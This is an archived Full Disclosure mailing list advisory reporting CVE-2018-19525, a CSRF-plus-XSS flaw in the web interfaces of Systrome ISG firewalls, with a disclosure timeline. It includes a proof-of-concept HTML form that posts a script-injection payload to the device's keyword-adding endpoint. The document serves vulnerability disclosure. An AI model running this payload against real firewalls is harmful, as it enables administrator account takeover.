[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] KSA-Dev-002: CVE-2018-19525 : Account takeover via XSRF in All ISG Series Firewall
From: Kingkaustubh via Fulldisclosure <fulldisclosure () seclists ! org>
Date: 2019-02-12 9:17:00
Message-ID: 2f84c96a-4b8e-38cc-5139-d75f0ec799e4 () me ! com
[Download RAW message or body]
=====================================================
Authenticated XSRF leads to complete Account Takeover
=====================================================
. contents:: Table Of Content
Overview
========
Title:- Authenticated XSRF leads to complete account takeover in all SYSTORME ISG Products.
CVE ID:- CVE-2018-19525
Author: Kaustubh G. Padwad
Vendor: Systrome Networks (http://systrome.com/about/)
Products:
1.ISG-600C
2.ISG-600H
3.ISG-800W
Tested Version: : ISG-V1.1-R2.1_TRUNK-20180914.bin(Respetive for others)
Severity: High--Critical
Advisory ID
============
KSA-Dev-002
About the Product:
==================
Cumilon ISG-* cloud gateway is the security product developed by Systrome for the distributed \
access network for the cloud-computing era. It integrates the L2-L7security features of the \
next-generation firewall, is based on the user identification and application identification \
and provides the application-layer firewall, intrusion prevention, anti-virus, anti-APT, VPN, \
intelligent bandwidth management, multi-egress link load balancing, content filtering, URL \
filtering, and other security functions. It provides the cloud interface. The security cloud \
management platform based on the big data platform architecture can monitor the network \
topology and device status in real time, simplifying the online deployment of the professional \
device via the auto configuration delivery. The real-time monitoring of the mobile terminal \
reduces the maintenance cost and makes the security visible at any time and anywhere. Systrome \
cloud gateway is the best access security choice of the middle and smal l enterprises, branch \
interconnection, and chain enterprises.
Description:
============
An issue was discovered on Systrome ISG-600C,ISG-600H, and ISG-800W 1.1-R2.1_TRUNK-20180914.bin \
devices. There is CSRF via /ui/?g=obj_keywords_add and/ui/?g=obj_keywords_addsave with \
resultant XSS because of a lack of csrf token validation.
Additional Information
======================
The web interface of the ISG-Firewalls does not validate the csrftoken,and the \
?g=obj_keywords_add page does not properly sanitize the user input which leads to xss, By \
combining this two attack we can form the XSRF request which leads to complete account takeover \
using XSRF.
[Vulnerability Type]
====================
Cross Site Request Forgery (CSRF)
How to Reproduce: (POC):
========================
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://192.168.1.200/ui/?g=obj_keywords_add" method="POST">
<input type="hidden" name="name" value="xsrf" />
<input type="hidden" name="description" value="<svg><script>//" />
<input type="hidden" name="NewLine;confirm(1338);</script </svg>" value="" />
<input type="hidden" name="keyword" value="xsrf" />
<input type="hidden" name="submit_post" value="obj_keywords_addsave" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
[Affected Component]
obj_keywords_add ,obj_keywords_addsave, CSRF Vulnerabilities,
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Code execution]
true
------------------------------------------
[Attack Vectors]
once victim open the crafted url the device will get compromise
Mitigation
==========
vendr is working on the same he will submit the solution maybe by december 1st weak.
Disclosure:
===========
02-Nov-2018 Discoverd the Vulnerability
15-Nov-2018 Reported to vendor
25-Nov-2018 Requested for CVE/Cve's.
26-Nov-2018 CVE-Assign
[Vendor of Product]
Systrome Networks (http://systrome.com/about/)
credits:
========
* Kaustubh Padwad
* Information Security Researcher
* kingkaustubh@me.com
* https://s3curityb3ast.github.io/
* https://twitter.com/s3curityb3ast
* http://breakthesec.com
* https://www.linkedin.com/in/kaustubhpadwad
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic